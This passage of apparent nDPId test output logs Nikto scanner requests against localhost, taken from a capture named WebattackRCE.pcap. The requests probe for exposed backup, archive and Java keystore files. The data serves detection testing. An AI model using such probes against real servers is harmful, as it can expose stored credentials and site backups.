(Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277168,"flow_last_seen":1576420277168,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277168,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50160,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_packet_id":1,"flow_last_seen":1576420277168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277168,"pkt":"AAAAAAAAAAAAAAAACABFAADFNC9AAEAGCAJ\/AAABfwAAAcPwH5DG1AyisQj3YYAYAED+uQAAAQEICp1m\/NidZvzYR0VUIC8xMjcuMC4wLjEuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277168,"flow_last_seen":1576420277168,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277168,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50160,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277170,"flow_last_seen":1576420277170,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277170,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50162,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":1,"flow_last_seen":1576420277170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277170,"pkt":"AAAAAAAAAAAAAAAACABFAADDKQdAAEAGEyx\/AAABfwAAAcPyH5DtUBGKsAbmZ4AYAED+twAAAQEICp1m\/NqdZvzZR0VUIC8xMjcuMC4wLndhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277170,"flow_last_seen":1576420277170,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277170,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50162,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277171,"flow_last_seen":1576420277171,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277171,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50164,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_packet_id":1,"flow_last_seen":1576420277171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277171,"pkt":"AAAAAAAAAAAAAAAACABFAADDFtRAAEAGJV9\/AAABfwAAAcP0H5DIKS5flUY6Y4AYAED+twAAAQEICp1m\/NudZvzbR0VUIC8xMjcuMC4wLndhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277171,"flow_last_seen":1576420277171,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277171,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50164,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277172,"flow_last_seen":1576420277172,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277172,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50166,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":1,"flow_last_seen":1576420277172,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277172,"pkt":"AAAAAAAAAAAAAAAACABFAADBjc9AAEAGrmV\/AAABfwAAAcP2H5CR+bVBDfA+SoAYAED+tQAAAQEICp1m\/NydZvzcR0VUIC8xMjcuMC50Z3ogSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277172,"flow_last_seen":1576420277172,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277172,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50166,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277173,"flow_last_seen":1576420277173,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277173,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50168,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":1,"flow_last_seen":1576420277173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277173,"pkt":"AAAAAAAAAAAAAAAACABFAADBJThAAEAGFv1\/AAABfwAAAcP4H5BkXx28+RQoaIAYAED+tQAAAQEICp1m\/N2dZvzdR0VUIC8xMjcuMC50Z3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277173,"flow_last_seen":1576420277173,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277173,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50168,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277175,"flow_last_seen":1576420277175,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277175,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50170,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":1,"flow_last_seen":1576420277175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277175,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/vR9AAEAGfxd\/AAABfwAAAcP6H5AAgoWRJHk9poAYAED+swAAAQEICp1m\/N+dZvzfR0VUIC8xMjcuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277175,"flow_last_seen":1576420277175,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277175,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50170,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277176,"flow_last_seen":1576420277176,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277176,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50172,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_packet_id":1,"flow_last_seen":1576420277176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277176,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/G85AAEAGIGl\/AAABfwAAAcP8H5A9SCNDeIAPvYAYAED+swAAAQEICp1m\/OCdZvzgR0VUIC8xMjcuamtzIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277176,"flow_last_seen":1576420277176,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277176,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50172,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277177,"flow_last_seen":1576420277177,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277177,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50174,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":1,"flow_last_seen":1576420277177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277177,"pkt":"AAAAAAAAAAAAAAAACABFAADAz0lAAEAGbOx\/AAABfwAAAcP+H5CCs\/fKIUNf1IAYAED+tAAAAQEICp1m\/OGdZvzhR0VUIC9zaXRlLmFseiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277177,"flow_last_seen":1576420277177,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277177,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50174,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277179,"flow_last_seen":1576420277179,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277179,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50176,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":1,"flow_last_seen":1576420277179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277179,"pkt":"AAAAAAAAAAAAAAAACABFAADAZxxAAEAG1Rl\/AAABfwAAAcQAH5BgPl+VSob0sYAYAED+tAAAAQEICp1m\/OOdZvzjR0VUIC9zaXRlLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277179,"flow_last_seen":1576420277179,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277179,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50176,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277180,"flow_last_seen":1576420277180,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277180,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50178,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":1,"flow_last_seen":1576420277180,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277180,"pkt":"AAAAAAAAAAAAAAAACABFAADGTHlAAEAG77Z\/AAABfwAAAcQCH5A4KXT5upP6C4AYAED+ugAAAQEICp1m\/OSdZvzkR0VUIC8xMjcuMC50YXIubHptYSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277180,"flow_last_seen":1576420277180,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277180,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50178,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277183,"flow_last_seen":1576420277183,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277183,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50180,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":1,"flow_last_seen":1576420277183,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277183,"pkt":"AAAAAAAAAAAAAAAACABFAADGDUpAAEAGLuZ\/AAABfwAAAcQEH5BEmzXIVOhE3IAYAED+ugAAAQEICp1m\/OadZvzmR0VUIC8xMjcuMC50YXIubHptYSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277183,"flow_last_seen":1576420277183,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277183,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50180,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 